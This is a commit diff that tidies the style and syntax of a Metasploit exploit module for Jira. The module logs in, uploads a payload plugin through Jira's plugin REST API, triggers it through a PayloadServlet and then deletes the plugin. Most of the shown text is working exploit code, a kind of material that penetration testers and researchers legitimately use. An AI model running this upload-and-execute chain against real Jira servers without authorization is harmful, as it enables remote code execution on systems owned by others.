Fixed stylistic and syntax errors

2018-10-11 09:19:35 -04:00 · 2018-10-11 09:19:35 -04:00 · 86f7c270c6
parent 0f3917f540
commit 86f7c270c6
1 changed files with 27 additions and 25 deletions
--- a/modules/exploits/multi/http/jira_plugin_upload.rb
+++ b/modules/exploits/multi/http/jira_plugin_upload.rb
@ -129,41 +129,43 @@ class MetasploitModule < Msf::Exploit::Remote
    data << "\r\n--#{boundary}--"

    print_status("Attempting to upload #{name}")
-    res = send_request_raw({
-      'uri'            => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/?token=#{upm_token}"),
+    res = send_request_cgi({
+      'uri'            => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),
+      'vars_get'       =>
+        {
+          'token'      => "#{upm_token}"
+        },
      'method'         => 'POST',
      'data'           => data,
      'headers'        =>
        {
          'Content-Type' => 'multipart/form-data; boundary=' + boundary,
-          'Cookie' 	 => good_cookie.to_s
+          'Cookie'       => good_cookie.to_s
        }
    }, 25)

-    if res && res.code == 202
-      print_status("Successfully uploaded #{name}")
-
-      print_status("Executing #{name}")
-      Rex::ThreadSafe.sleep(3)
-      send_request_cgi({
-        'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
-        'method'       => 'GET',
-        'cookie'       => good_cookie.to_s
-      })
-
-      print_status("Deleting #{name}")
-      send_request_cgi({
-        'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
-        'method'       => 'DELETE',
-        'cookie'       => good_cookie.to_s
-      })
-
-    else
+    unless res && res.code == 202
      print_status("Error uploading #{name}")
      print_status("HTTP Response Code: #{res.code}")
      print_status("Server Response: #{res.body}")
      return
    end
+
+    print_status("Successfully uploaded #{name}")
+    print_status("Executing #{name}")
+    Rex::ThreadSafe.sleep(3)
+    send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),
+      'method'       => 'GET',
+      'cookie'       => good_cookie.to_s
+    })
+
+    print_status("Deleting #{name}")
+    send_request_cgi({
+      'uri'          => normalize_uri(target_uri.path.to_s, "rest/plugins/1.0/#{name}-key"),
+      'method'       => 'DELETE',
+      'cookie'       => good_cookie.to_s
+    })
  end

  def access_login?
@ -208,8 +210,8 @@ class MetasploitModule < Msf::Exploit::Remote
  def do_auth
    res = send_request_cgi({
      'uri'          => normalize_uri(target_uri.path.to_s, 'login.jsp'),
-      'method'	     => 'POST',
-      'cookie'       => 'atlassian.xsrf.token=' + @xsrf_token + '; ' + @session_id,
+      'method'       => 'POST',
+      'cookie'       => "atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}",
      'headers'      => {
      },
      'vars_post'      => {
@ -218,7 +220,7 @@ class MetasploitModule < Msf::Exploit::Remote
      'os_destination' => '',
      'user_role'      => '',
      'atl_token'      => '',
-      'login' 	       => 'Log+In'
+      'login'          => 'Log+In'
      }
    })
    return res